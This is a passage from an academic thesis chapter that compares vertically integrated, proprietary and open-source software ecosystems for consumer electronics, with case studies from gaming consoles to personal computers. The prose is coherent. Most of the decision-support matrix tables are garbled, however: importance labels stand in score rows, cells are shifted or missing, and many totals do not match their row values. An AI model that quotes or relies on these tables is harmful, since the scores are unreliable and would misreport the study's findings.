For the vertically integrated platform type the integration is easier to manage since no complementors are involved and the integration is done with in-house development for which the interfaces can be defined (hence score = +). For the proprietary platform type this is challenging since this may require that code has to be altered or glue components have to be developed [Hartmann 2013] (hence score = -). In the open source platform type the device manufacturers or the system integrators can perform the hardware/software integration without (intensive) support of the platform supplier. Therefore we evaluate this as neutral (score = 0).
Table 2 gives and overview of the strengths and challenges per ecosystem type.
**Table 2 Overview of types of ecosystems and their strengths and challenges**
<table>
<thead>
<tr>
<th>Type / Requirement</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-</td>
<td>+</td>
<td>-</td>
<td>+</td>
<td>+</td>
<td>+</td>
<td>+</td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>0</td>
<td>-</td>
<td>-</td>
<td>+</td>
<td>-</td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+</td>
<td>0</td>
<td>+</td>
<td>0</td>
<td>-</td>
<td>-</td>
<td>0</td>
</tr>
</tbody>
</table>
In this overview: + means: easier to address, i.e. a strength, 0 means: neutral, - means: challenging
**3.4.5 Step 3: Creation of the decision support matrix**
The determination, of which type of ecosystem is most suitable, is based on comparing the importance of each requirement with the strengths and challenges of the ecosystem types from Table 2. The decision support matrix of a product category shows the evaluation for each ecosystem type. An example is shown in Table 3. This matrix shows which of the requirements are of “high” importance and those that are “key”.
Table 3 Example of a decision support matrix
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>High</td>
<td>High</td>
<td>Key</td>
<td>High</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>-1</td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>-2</td>
<td>-1</td>
<td>-3</td>
<td>n.a.</td>
<td></td>
<td>-2</td>
<td>-1</td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>+1</td>
<td>+2</td>
<td>0</td>
<td>+4</td>
<td>1</td>
<td></td>
<td>+3</td>
<td>+4</td>
</tr>
</tbody>
</table>
The total score is an addition of the individual scores for each requirement, i.e. ranging from -1 to +1. Here the scores of the key requirements are doubled, to express their relative higher importance, and are therefore ranging from -2 to 2.
The final column shows which of the ecosystem types are used most in the current market. In this example the open source platform type is used most, followed by the vertically integrated type, while the proprietary type is not available (n.a.).
3.5 Case Studies
The case studies in this section cover a wide range of consumer electronics products that support 3rd party applications: (1) Gaming Consoles, (2) Digital Cameras, (3) Digital Televisions and Set-top Boxes, (4) Smart Watches, (5) Smart Phones, (6) Tablets and (7) Personal Computers. This selection includes products that exist for a decade or longer as well as products that are recently introduced. Furthermore both large boxes and wearable devices are included. Each case study contains a brief description of the product, the firms that are active, a historical overview of the transitions, a description of the ecosystems that are used and the ecosystems that are considered most suitable, using the multi-criteria decision support method, and those that are used most.
These case studies are based on publicly available information. The determination of the importance of each requirement is done by the authors based on the products that are currently available in the market and supported by references when available.
3.5.1 Gaming Consoles
Product description and historical overview
Gaming consoles have existed since the fifties and originally only contained games that were integrated in the consoles. Later it became possible to purchase games separately, initially as cartridges, later as CD-ROMS and today downloadable from the Internet. The development of games was initially done by in-house developers, the so-called 1st party developers. Later games were also developed by 2nd party developers, i.e. game developers that worked on a contract base for the console manufacturers and later 3rd parties who independently developed games for a specific console. Hence the use of ecosystems was
introduced already early for these products. However, the sales of games is controlled by the publishers, i.e. the manufactures of the consoles.
Gaming consoles are replaced with new versions every three to four years and consists of radical new functionality compared to the previous version [worldfinance 2014]. Consumers are willing to buy these new products, e.g. to support faster games, better graphics, 3D, motion detection and so on. Furthermore, consumers spend a great deal of money on new games, which provides additional revenues for the console manufacturers. Since the nineties, only three or four console manufactures had a dominant position [Vgchar hartz 2014], which resulted in a customer base that was large enough to amortize the investments.
Manufacturers do not create many variants of their products; only regional differences are supported. In this way the developed games can be played on all the devices, where backwards compatibility of older versions of consoles is not supported. The major manufacturers use a proprietary hardware/software platform and have done so since the beginning of this industry.
In 2013 gaming consoles where introduced based on the open source software platform Android, such as Shield, Gamestick and Ouya. However none of these initiatives gained a large market share because they did not create the gaming experience that the traditional manufacturers offered [Trew 2014, Kain 2014, Hollister 2014]. A proprietary closed source software platform is not used in this market.
Analysis of ecosystem type
This product category is characterized in which almost all the requirements are evaluated as being of high importance with speed of innovation and interface stability as key requirements. The development costs are high since consoles consist of a large amount of software that need to support a variety of input devices and to support different screens. Also the requirements for system resources and hard real time requirements are high because performance and graphics quality determine the attractiveness of the system. The speed of innovation is key because gamers switch between systems frequently and want to play the latest games using the latest technology. A stable interface an absolute necessity because it has to be guaranteed that a purchased games run on a given console.
Table 4 Decision support matrix for gaming consoles
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stabil</th>
<th>G: Integr. Effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-1</td>
<td>+2</td>
<td>+1</td>
<td>+2</td>
<td>+1</td>
<td>+5</td>
<td>-1</td>
<td>1</td>
<td></td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>-2</td>
<td>-1</td>
<td>+2</td>
<td>-1</td>
<td>-5</td>
<td>0</td>
<td>-</td>
<td></td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>0</td>
<td>+1</td>
<td>-2</td>
<td>0</td>
<td>0</td>
<td>0</td>
<td>2</td>
<td></td>
</tr>
</tbody>
</table>
Table 4 shows that the vertically integrated platform type scores substantially better than the other types. This is because the speed of innovation and hard real time requirements are supported the best in this ecosystem type while the variability is not an important requirement. Due to the speed of innovation it is not expected that a high degree of modularity can be obtained. The vertically integrated ecosystem type is by far used the most in this market and this is likely to remain the dominant type.
The development costs are a main challenge. As a consequence only a few, 2 to 3, manufacturers have been successful in the market and newcomers are rarely successful. This is in sharp contrast with most consumer electronics products, e.g. televisions, audio players, smart phones etcetera, in which many firms are active and have a profitably business, and for which the development investments are substantially lower.
3.5.2 Digital Photo Cameras
Product description and historical overview
Digital cameras have been introduced in the mid-nineties and rapidly replaced photographic films. Digital cameras contain dedicated hardware components and operating system that have hard real time requirements to ensure that the system response timely and store an image correctly. The size of this software has been relatively small and focuses on a few dedicated tasks. In later years software features where added such as facial recognition, however a general purpose operating system was not needed.
Around 2010 cameras became connected via Wi-Fi, at first mainly to upload pictures. Due to the growing popularity of smart phones, and the reduced costs for hardware components, manufacturers started using android as a platform to add functionality that exists in smartphones. At the same time smart phones were equipped with higher quality lenses and sensors and cross-over product, such as the Samsung Galaxy K zoom were created. This cross-over is not surprising since Android was initially intended as platform for digital cameras [Berenaum 2013]. Lythro has created a camera that is focused on 3D and allows for focusing after the picture has been taken. Lythro offers a software platform, along with their device that is able to share pictures with social media [Lytro 2014]. Until know Lythro has not yet made their platform available for 3rd parties.
In the early conception of digital cameras, i.e. until 2005 the speed of innovation was high resulting in consumer willing to purchase new cameras with better image quality and features created through software. In later years, e.g. since 2010, the speed of innovation is much lower and the innovation is limited. As a result the sales on new cameras dropped [Mintel 2014].
Analysis of ecosystem type
The variability requirements are high because digital cameras are offered in large amounts of variants, e.g. ranging from compact cameras till single reflex cameras and a variety of types in between. Furthermore, different sensors, (touch screen) displays, flash lights etcetera are used. The uses of system resources and hard real time requirements is challenging because ICs with as small as possible footprint should be used because of the high pressure on cost price and because the response time when taking a picture is crucial. In contrast with gaming consoles, innovation is not a requirement of high importance
because digital photo cameras usually follow the functionality in smart phones. Also interface stability is less important because supporting 3rd party applications is not a key selling feature.
Table 5 Decision support matrix for digital photo cameras
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-1</td>
<td>+1</td>
<td>High</td>
<td>High</td>
<td></td>
<td></td>
<td></td>
<td>0</td>
<td>n.a.</td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>-1</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>-1</td>
<td>n.a.</td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>+1</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td>+2</td>
<td>1</td>
</tr>
</tbody>
</table>
Table 5 shows that the open source software platform has the highest total score, because the variability is high while the speed of innovation is very important for this type of product. A high degree of modularity is not likely to be obtained because of the need to support a large range of products while using ICs with a low cost price is essential. Therefore a proprietary software platform is not a suitable ecosystem type. In the current market only an open source platform is used.
3.5.3 Digital televisions and set-top boxes
Product description and historical overview
Televisions, and later digital televisions and set-top boxes, where developed by specialized firms that developed and manufactured the entire product. Over time more and more software and hardware components from specialized suppliers where used [Hartmann 2012]. The last decade years, i.e. since 2007, the possibility to add 3rd party applications is introduced so that consumers can use applications that they are familiar with from their personal computers and smartphones. Examples are YouTube, weather forecasts and sharing of pictures. For these types of TVs, the term “Smart TV” is used.
Many firms have created an ecosystem based on a vertically integrated platform, such as Samsung with Smart TV [Samsungforum 2014], LG with WebOS [Onlinerreport 2014] and Apple with AppleTV [Apple 2014], a set-top box.
A large number of open source platforms have entered the market, including Android TV [Android 2014], Meego [Meego 2014], Ubuntu TV [UbuntuTV 2014] and XBMC [XMBC 2014]. Also vendors of proprietary platforms have entered the market, such as Horizon TV [Horizon 2014], Microsoft TV [TheVerge 2014A], and Yahoo! TV [YahooTV 2014]. Many of these platforms aim both digital televisions as well as set-top boxes since these devices largely contain the same hardware and software components. A variety of platforms is used, where none has gained a dominant position. Recently a number
of firms, with a relatively small market share, have adopted the open source software platform Android, such as Philips, Sony and Sharp [Engadget 2014].
**Analysis of ecosystem type**
The development cost are high because the software in these systems have to support a large range of broadcasting standards and require a high amount of software to efficiently create a good quality of pictures with high frame rate and high pixel density. The variability is high because digital televisions are developed with different screen size, price setting, should be able to support different regional standards and should be able to operate together with many other products. System resources and hard real time requirements are evaluated as main requirement because there is a large pressure on cost price and because power consumption has to remain low because cooling fans are not accepted in these products. Furthermore showing video and playing audio needs to be done without visual or audible interruptions. Finally, the integration effort is high since a large number of components from different suppliers need to be integrated and a high degree of modularity has not been obtained.
**Table 6 Decision support matrix for digital televisions and set-top boxes**
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>0</td>
<td>1</td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>-2</td>
<td>-2</td>
<td>3</td>
<td>3</td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>+1</td>
<td>+1</td>
<td>0</td>
<td>+3</td>
<td>2</td>
<td>2</td>
<td>2</td>
<td>2</td>
</tr>
</tbody>
</table>
Table 6 shows that the open source software score best on most aspects, directly followed by the vertically integrated platform type. This analysis is in contrast with current practice in which the vertically integrated platform type is most used, where the two major players, Samsung and LG own 40% of the market share [Strategy 2014]. We believe that this is caused by commercial reasons, i.e. the manufacturers are reluctant to use an open source or proprietary platform with the fear that a dominant firm may take most of the revenues. Furthermore the investments to switch from an existing platform to a new one are significant and the major players have a large market share thus causing little commercial pressure.
The main player in this market, i.e. Samsung [Strategy 2014], uses a proprietary platform which is based on the open source platform Tizen [Samsungforum 2014]. Consequently, Tizen may become an important candidate to dominate this market and a battle for dominance with Android may be expected [Information 2014A].
3.5.4 Smart Watches
Product description and historical overview
Smart watches have been introduced in recent years but already exists in a wide variety. The functionality of most watches is, in addition to displaying the time, focused on showing notifications of incoming calls and messages [Theguardian 2014], while some watches are able to play music, take pictures and can be used for making telephone conversations, such as the Samsung Gear [Androidwatches 2015]. A selection of watches is focused on fitness and health by monitoring heart rate and physical activity, such as the Pebble and the Basis Peak [Pebble 2015, Mybasis 2015]. Apple introduced the Apple Watch that can be used for contactless payment [AppleWatch 2015], which was earlier introduced for smart phones [Trustedreviews 2014].
While the functions of smart watches are currently limited, in comparison with smart phones, a major architectural challenge is size and battery lifetime. As a consequence special operating systems have been introduced to accommodate this. At this moment in time there is no dominant platform used: Google has introduced Android Wear, which was first used by firms such Samsung, LG and Motorola [Androidwatches 2014]. Samsung also started using the open source platform Tizen [TheVerge 2014B] By using this platform, for which Samsung act as main contributor, it has more control over the platform and is not dependent on Google. Other firms, such as Apple, Sony and Pebble use a proprietary platform [Pebble 2014, AppleWatch 2014, Connectedly 2014].
Analysis of ecosystem type
The variability is evaluated as key because with different functionality, size, price setting etcetera are needed to satisfy the different customer needs, and because watches are often a personal statement, which is why Android wear is not considered sufficiently modifiable by some vendor [Johnson 2015]. The speed of innovation is high because these products are new and it is uncertain which functionality will become successful in the market. The use of system resources and hard real time requirements are evaluated as key requirement, given the size of these devices and the increasing amount of ICs that are used in these products. Currently most smart watches need to be charged daily even when they are not used continuously.
Table 7 Decision support matrix for smart watches
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. Cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-2</td>
<td>+1</td>
<td>+2</td>
<td>+1</td>
<td>+1</td>
<td></td>
<td></td>
<td>1</td>
<td></td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>-</td>
<td>-2</td>
<td>-3</td>
<td>n.a.</td>
<td></td>
<td></td>
<td>n.a.</td>
<td></td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+2</td>
<td>0</td>
<td>+2</td>
<td>+4</td>
<td>1</td>
<td></td>
<td></td>
<td>1</td>
<td></td>
</tr>
</tbody>
</table>
Table 7 shows that the open source platform type is most suitable since this offers the consumer electronics and watch manufactures the best option to create distinguishable products. In the current market multiple open source platforms as well as multiple vertically integrated platforms are used, however little is known about the market shares. A proprietary software platform type is not available and based on this analysis this type is unlikely to become successful in this market especially because it is difficult for this type to support the requirements for optimal use of system resources.
3.5.5 Smart phones
Product description and historical overview
A description of the transition in the industry is already given in section 3.3.1. This subsection is limited to the trends in functionality: Initially the functionality of these products was limited to making telephone calls and sending messages via SMS. Around 1996 the so called feature phones were introduced that supported downloadable ringtones, playing music and games. A major shift occurred when functionality was incorporated that was previously available in personal digital assistants (PDA’s), such as a Wi-fi connection, GPS and at a later stage, the introduction of touch screens. As a result, a mobile phone, now called smart phone, attracted a large group of users, which are using their devices for a variety of tasks such as making pictures, using social media and communication with friends and others using WhatsApp and Twitter.
Analysis of ecosystem type
The development costs and innovation are evaluated as of high importance given continues effort that is needed to introduce new functionality. The use of system resources and hard real time requirements: Evaluated as high, given the size of these devices and the need to have a long battery lifetime. The interface stability is regarded as an important requirement because application developers should be able to rely that their product functions on the different devices, to amortize their investments. The variability is evaluated as key because it is needed to support phones with different functionality, size, price setting, quality of the camera, design etcetera and users typically buy a product that exactly serves their needs.
Table 8 Decision support matrix for smart phones
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>Vertical Integrated</td>
<td>High</td>
<td>Key</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>0</td>
<td>-1</td>
<td>0</td>
<td>2</td>
</tr>
<tr>
<td>Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>-1</td>
<td>3</td>
</tr>
<tr>
<td>Open Source Software</td>
<td>+1</td>
<td>+2</td>
<td>0</td>
<td>+1</td>
<td>-1</td>
<td>+3</td>
<td>+3</td>
<td>+3</td>
<td>1</td>
</tr>
</tbody>
</table>
Table 8 shows that for smartphones, the open source platform type is evaluated as most suitable. This analysis reflects the market share of 2013 [Gartner 2014] since the open source software has 79% of the market and the vertically integrated platforms 18% and 3% is of a proprietary platform, i.e. Microsoft.
The overview also shows the challenges for each ecosystem type:
- For the vertically integrated type, Development costs & variability are the main challenges. Apple, a key player, addresses this by limiting the variability and development costs by focusing on a particular market segments and by only supporting the latest versions of the handsets [Grobart 2013].
- For the proprietary software type these challenges are: innovation & system resources. Windows addresses this by closely cooperating with a small group of HW platform suppliers [Duryee 2009] and acquired Nokia, a previously vertically integrated firm.
- For the open source software type, interface stability & fragmentation are the main challenges. Google, the main open source supplier, addresses this by offering a compatibility test suite offered [AndroidComp 2014] and by making agreements with handset makers to use standard Google apps and user interface [Gannes 2014].
3.5.6 Tablets
Product description and historical overview
Tablets have been introduced two decades ago by traditional computer manufacturers but did not gain much traction from the market in the first decade [Zdnet 2014]. With the introduction of the iPad by Apple, this product category become widely used. Soon other manufacturers followed that, similarly as Apple, used the same platform for tablets as for smart phones.
Tablets, especially with larger screens, are used for different purposes than smart phones. Smart phones are primarily used, besides making telephone calls, for taking and sharing pictures, sending messages and so forth. Tablets are more used for answering mail, reading books and magazines, and watching and editing pictures. Therefore, tablets are increasingly used in schools and in business environments and often replace books and personal computers [Washingtonpost 2014, Information 2014B].
Chapter 3
Analysis of ecosystem type
Development costs are evaluated as high given the continuous effort to introduce new functionality. The interface stability is also evaluated as high because these products are starting to replace laptops and these products are used by schools and business applications. Variability is also an important requirement, since tablets are offered with different price settings, screen sizes, and so on.
Table 9 Decision support matrix for tablets
<table>
<thead>
<tr>
<th>Iconic requirements</th>
<th>A: Development cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>1: Vertically Integrated</td>
<td>-1</td>
<td>-1</td>
<td>+1</td>
<td>+1</td>
<td>+1</td>
<td>2</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>2: Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>+1</td>
<td>+1</td>
<td>+1</td>
<td>3</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>3: Open Source Software</td>
<td>+1</td>
<td>+1</td>
<td>-1</td>
<td>+1</td>
<td>+1</td>
<td>1</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Table 9 shows that there is no difference in the total score between the three ecosystem types. In comparison with smart phones, the interface stability is regarded as also an important requirement, while system resources are less important because tablets have more options for heat dissipation and larger batteries.
In the current market there is only one vertically integrated player with a sizeable market share, i.e. Apple. For this type the interface stability is a big advantage over the open source platform type which is visible because schools use the iPad rather than an Android device [Washingtonpost 2014]. As an example: To accommodate the use of iPad in schools and business environments, Microsoft has ported Microsoft Office for the iPad, rather than for Android which has a larger market share, because of the fragmentation of the Android platform [Appleinsider 2014].
The market share of tablets, in comparison with smart phones reflects the differences. In comparison with smart phones, both the vertically integrated platform, i.e. Apple and the propriory software platform have a larger market share [Thenextweb 2014, Theregister 2014]. However, the share of the propriory software platform is (still) very small.
For the vendor of the propriory platform, i.e. Windows, this can be a very viable market, much more than smart phones, since the interface stability is regarded as important, while the use of optimal system resources is less important because of the size of these products. Therefore targeting this market with a propriory platform is expected to be more successful than targeting the market of smart phones as well, which is the current strategy of Microsoft [BBCNews 2014].
3.5.7 Personal Computers
Product description and historical overview
Personal computers were originally developed by vertically integrated firms, but with the introduction of a Microsoft's MS-DOS and a modularization of the PCs hardware an ecosystem was created, the so called Wintel platform [Baldwin 1997].
The innovation of PCs has been small since more than a decade and consumers only switch to a new product when the old system is becoming too slow or does not support the software that they need to use. This often leads to version of new operating systems that are not adopted by the business and only limited by consumers. For instance Windows Vista was hardly adopted in a business environment. In this market one proprietary software platform is present, i.e. Microsoft Windows, and only one vertically integrated platform type, i.e. Apple. Also some open source software vendors are present, e.g. Linux, Chrome OS and FreeBSD.
Analysis of ecosystem type
Development cost: Development costs are evaluated as high because PC’s should be able to support a wide range of products, require frequent updates for security reasons and so on. Furthermore, users only switch to a new version when it is really needed, thus making it difficult to amortize the investments. Quality is evaluated as high, since these products have to support business critical applications and interface stability. This is evaluated as an absolute must because a user or company has to rely that an application he purchases will function correctly, and that it keeps on functioning during a long period of time.
Table 10 Decision support matrix for personal computers
<table>
<thead>
<tr>
<th>Important requirements</th>
<th>A: Dev. cost</th>
<th>B: Quality</th>
<th>C: Variability</th>
<th>D: Innovation</th>
<th>E: System resources</th>
<th>F: Interface Stability</th>
<th>G: Integr. effort</th>
<th>Total Score</th>
<th>Most used type</th>
</tr>
</thead>
<tbody>
<tr>
<td>Vertically Integrated</td>
<td>High</td>
<td>High</td>
<td>Key</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Proprietary Software</td>
<td>0</td>
<td>0</td>
<td>+2</td>
<td></td>
<td></td>
<td>+2</td>
<td></td>
<td>2</td>
<td></td>
</tr>
<tr>
<td>Open Source Software</td>
<td>+1</td>
<td>0</td>
<td>-2</td>
<td></td>
<td>-1</td>
<td>+2</td>
<td></td>
<td>3</td>
<td></td>
</tr>
</tbody>
</table>
Table 10 shows that the proprietary software type scores higher than the vertically integrated platform and the proprietary software type. In the market Microsoft has the largest market of around 90%, with personal computers of Apple’s just below 10% [Theregister 2014]. Open source software platforms are marginally used. Although there are benefits of the open source ecosystem type, the disadvantage, i.e. the interface stability, is a key requirements and prevents that this type likely to gain a significant market share. The only open source software platforms that have some success is the Chromebook, which is completely focused.
Chapter 3
on using a personal computer as client for web usage [Chrome 2015], and therefore relies on HTML as a stable interface. A native API is not offered.
3.6 Comparison with Related Art
In our previous work [Hartmann 2012] we analyzed the transition of mobile devices from 1990 until 2010, where the current paper analyses the situation of today. In [Hartmann 2012] we introduced a model consisting of 5 industry structure types, ranging from vertically integrated to closed and open ecosystems. The different types of ecosystems in the current paper is a refinement of the two ecosystem types described in that paper, where the vertically integrated hardware software platform consists is based on a vertically integrated platform, but has created a standardized interface for 3rd parties to contribute. In that earlier work the difference between a proprietary and open source platform types were not identified.
Another previous work of the co-author [Bosch 2010] describes architectural challenges. Some of these challenges have been used in the current paper as criteria that determine the best suitable scope. However in that work the criteria have not been identified for mobile devices or embedded systems.
In the work of Knauss and Hammouda [Knaus 2014] an assessment method is introduced that determines the suitability of a software architecture for an eco-system centric approach. In their work they addressed the tradeoff between the degree of openness of a software platform and reasons to limit the freedom. Their work did not include a comparison between different types of ecosystems for consumer electronics products.
The work of Gawer and Cusumano [Gawer 2008] discusses the scope and technology design of a platform but does not discuss implications for software engineering nor does this work identify or compare different types of ecosystems for consumer electronics products. Other related work identified different types of ecosystems [Baldwin 1997, Jansen 2012, Bosch 2009] but did not compare ecosystems in a particular domain nor did it identify the challenges from a software engineering perspective.
To our knowledge there is no related art that analyzes different types of ecosystem for consumer electronics and related work that contains a decision support model for different types of ecosystems; and therefore this paper is one of the first of its kind.
3.7 Conclusions and Further Research
In this paper we identified three different types of ecosystems for consumer electronics to support 3rd party applications and identified the criteria that determine the best suitable scope and technology design form a software engineering perspective. Based on this analysis we introduced a first step towards multi-criteria decision support method to determine the most suitable ecosystem type for consumer electronics products and used this method to analyze a wide range of products. Although our decision support method is not complete at this moment in time, and further research is needed, the analysis using this method already revealed essential difference between the types of ecosystems and their suitability for different product types.
This analysis shows that when the speed of innovation is a key requirement while variability is less important, the vertically integrate hardware/software type is more suitable. This is the case for gaming consoles.
For product types that require a high degree of variability and when it is needed to share the development investment of the platform between multiple firms, the open source software type is more suitable. Examples of such products are digital photo cameras, digital televisions, smart watches and smart phones.
For product types for which a stable interface is a key requirement, and development costs and quality are also important requirements, the proprietary software platform type is most suitable. This has been analyzed to be the case for personal computers. The proprietary software platform is less suitable for traditional consumer electronics products given the high pressure on cost price, which requires ICs with a small footprint and optimal use of system resources. On the other hand, open source software platforms are unlikely to gain a dominant position in the market of PC's, since the requirements for interface stability are key, which is difficult to achieve for this ecosystem type.
For tablets, all three ecosystem types are considered equally suitable since these products have characteristics of both smart phones and personal computers.
While the choice of an ecosystem type is also, and possibly even more, determined by commercial and organizational aspect, in most cases the type that was considered most suitable using our decision support method, turned out to be the type that is most used in the market. This provides confidence that the introduced model is a sound first step.
The case studies also showed how the individual requirements influence the market and the choices of consumer electronics firms and software vendors. For instance, the challenge of development cost for the gaming consoles results that just a few players are active. In the smart phone and tablet domain, Apple focusses on a limited variety of products, Microsoft took over an existing hardware firm to be able to act as a vertically integrated HW/SW ecosystem type, and Google is offering a compatibility test suite and makes agreements with the handset makers to use standard Android in order to avoid fragmentation.
A primary topic for further research is to include business and organizational aspects in a decision support model. Further research may also reveal more relevant criteria. Furthermore an evaluation that is based on the expert opinion of more experts, and a more fine-grained analysis of the importance of the criteria will provide higher confidence in the results of the analysis. Due to these limitations, we consider the method introduced in this paper a first step towards a full-fledged decision support method.
In the categorization and comparison of ecosystem types, a strict separation was made between open source and proprietary closed source. However, software vendors may use a mixed approach, in which part of the software is proprietary, e.g. to create a stable interface towards the 3rd party application developers, while other parts can be used without restrictions. Similarly a vendor may decide that a certain part of the closed source platform may be modified, e.g. to easier support different hardware configurations. These mixed approaches will lead to a combination of both types of ecosystems. More research is needed to identify what the consequences for each of these ecosystem types are.
The key contributions of this paper are threefold:
Chapter 3
(1) Three types of ecosystems are identified that are used in consumer electronics to support 3rd party applications.
(2) A first step towards multi-criteria decision support method is introduced to select the most suitable ecosystem type for a product categories, from a software engineering perspective.
(3) Case studies of seven consumer electronics products are presented and a comparison is made between the suitability of the types that are used in traditional consumer electronics products with those that are used in mobile devices and personal computers.
Firms that create consumer products and are considering to adopt an ecosystems centric approach can use the method presented in this paper to choose the type of ecosystem that will suit the market demands in the best way and address the challenges that arise as a result of this choice. Especially in an emerging market where no dominant ecosystems are available, such a choice is non-trivial and of crucial strategic importance.
Firms that create software platforms can use this method to target the product types for which this is most suitable and pro-actively address the identified challenges to make their platform successful in the market.
Part II: Variability Management in Software Supply Chains
“It is not necessary to change. Survival is not mandatory.”
W. Edwards Deming
|
{"Source-Url": "https://www.rug.nl/research/portal/files/23140610/Chapter_3.pdf", "len_cl100k_base": 16070, "olmocr-version": "0.1.53", "pdf-total-pages": 29, "total-fallback-pages": 0, "total-input-tokens": 70304, "total-output-tokens": 16715, "length": "2e13", "weborganizer": {"__label__adult": 0.0013866424560546875, "__label__art_design": 0.0019702911376953125, "__label__crime_law": 0.0006055831909179688, "__label__education_jobs": 0.0029163360595703125, "__label__entertainment": 0.0006351470947265625, "__label__fashion_beauty": 0.0010433197021484375, "__label__finance_business": 0.00408172607421875, "__label__food_dining": 0.000950336456298828, "__label__games": 0.006320953369140625, "__label__hardware": 0.328857421875, "__label__health": 0.000965595245361328, "__label__history": 0.0008654594421386719, "__label__home_hobbies": 0.0009355545043945312, "__label__industrial": 0.0024871826171875, "__label__literature": 0.0007901191711425781, "__label__politics": 0.00045609474182128906, "__label__religion": 0.001068115234375, "__label__science_tech": 0.0987548828125, "__label__social_life": 0.0001010894775390625, "__label__software": 0.0220794677734375, "__label__software_dev": 0.51953125, "__label__sports_fitness": 0.0006551742553710938, "__label__transportation": 0.002040863037109375, "__label__travel": 0.00039577484130859375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 77904, 0.02321]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 77904, 0.29597]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 77904, 0.93588]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 2550, false], [2550, 6102, null], [6102, 9387, null], [9387, 11508, null], [11508, 14220, null], [14220, 17070, null], [17070, 19090, null], [19090, 22414, null], [22414, 25590, null], [25590, 28886, null], [28886, 32250, null], [32250, 35700, null], [35700, 38816, null], [38816, 42012, null], [42012, 45325, null], [45325, 48718, null], [48718, 51871, null], [51871, 54766, null], [54766, 57083, null], [57083, 60347, null], [60347, 63498, null], [63498, 66521, null], [66521, 69732, null], [69732, 72919, null], [72919, 76540, null], [76540, 77766, null], [77766, 77904, null], [77904, 77904, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 2550, true], [2550, 6102, null], [6102, 9387, null], [9387, 11508, null], [11508, 14220, null], [14220, 17070, null], [17070, 19090, null], [19090, 22414, null], [22414, 25590, null], 